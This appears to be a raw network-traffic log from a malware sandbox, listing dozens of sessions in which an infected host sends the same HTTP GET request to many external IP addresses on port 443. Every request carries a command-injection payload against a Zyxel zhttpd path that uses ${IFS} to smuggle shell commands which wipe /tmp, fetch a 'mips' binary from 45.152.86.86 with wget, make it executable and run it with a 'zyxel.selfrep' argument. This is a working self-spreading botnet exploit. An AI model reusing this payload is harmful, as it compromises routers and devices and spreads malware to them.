                              Mar 31, 2024 08:41:20.736294031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3515192.168.2.1356898120.254.229.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736331940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3516192.168.2.135444498.47.69.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736372948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3517192.168.2.1358030112.80.8.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736423016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3518192.168.2.1350968212.102.14.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736470938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3519192.168.2.133689259.176.191.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736514091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3520192.168.2.133798865.172.116.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736545086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3521192.168.2.1351806211.154.196.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736584902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3522192.168.2.135689642.253.93.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736648083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3523192.168.2.134417693.94.64.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736700058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3524192.168.2.135814024.162.128.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736732006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3525192.168.2.1340540115.230.98.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736783981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3526192.168.2.1346002185.222.166.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736826897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3527192.168.2.1357954155.183.151.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736880064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3528192.168.2.1333344172.155.170.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736903906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3529192.168.2.133325488.154.108.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736938000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3530192.168.2.1342418161.233.149.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.736979961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3531192.168.2.134012872.48.80.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737035036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3532192.168.2.1350078166.2.135.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737057924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3533192.168.2.1338572212.39.149.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737093925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3534192.168.2.1336674180.24.90.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737145901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3535192.168.2.133742898.133.255.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737185955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3536192.168.2.1346512193.49.18.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737217903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3537192.168.2.1345612172.232.140.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737270117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3538192.168.2.135163682.81.174.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737286091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3539192.168.2.134482060.73.192.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737344027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3540192.168.2.1350212157.206.86.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737394094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3541192.168.2.1345772179.114.103.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737422943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3542192.168.2.135545458.89.67.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737451077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3543192.168.2.134304654.151.89.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737485886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3544192.168.2.1344748159.3.250.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737541914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3545192.168.2.135509479.38.104.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737565994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3546192.168.2.1343080150.254.17.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737608910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3547192.168.2.1344066112.76.8.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737663984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3548192.168.2.13438229.140.76.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737704992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3549192.168.2.1338312182.26.133.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737721920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3550192.168.2.135075831.94.173.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737782001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3551192.168.2.135725040.218.69.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737833023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3552192.168.2.135483865.147.2.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737878084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3553192.168.2.1359764145.55.62.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737930059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3554192.168.2.1343858198.201.46.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.737967014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3555192.168.2.133680858.113.237.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738003016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3556192.168.2.1343072114.78.144.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738051891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3557192.168.2.134621060.19.192.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738105059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3558192.168.2.1339210191.169.108.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738128901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3559192.168.2.135582019.141.128.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738174915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3560192.168.2.1348304143.131.186.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738219976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3561192.168.2.1340076137.132.78.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738261938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3562192.168.2.133564435.50.167.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738291979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3563192.168.2.135948289.9.93.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738336086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3564192.168.2.1335874209.25.43.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738368034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3565192.168.2.1360034176.234.176.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738389969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3566192.168.2.134556617.46.210.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738440037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3567192.168.2.1335358170.99.67.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738486052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3568192.168.2.134973837.226.108.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738516092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3569192.168.2.1348164152.42.38.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738555908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3570192.168.2.1345548123.38.179.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738612890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3571192.168.2.135771096.57.77.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738658905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3572192.168.2.134310031.22.121.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738698006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3573192.168.2.134112043.204.46.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738733053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3574192.168.2.1348556101.221.23.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738763094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3575192.168.2.1349298153.177.37.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738792896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3576192.168.2.1337322102.148.51.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738857985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3577192.168.2.134186834.60.188.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738910913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3578192.168.2.135381289.184.154.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738953114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3579192.168.2.1333530196.169.189.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.738989115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3580192.168.2.1348514154.213.62.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739016056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3581192.168.2.1360528110.81.139.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739057064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3582192.168.2.1336352205.210.155.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739104986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3583192.168.2.1360178200.199.30.95443
                              TimestampBytes transferredDirectionData
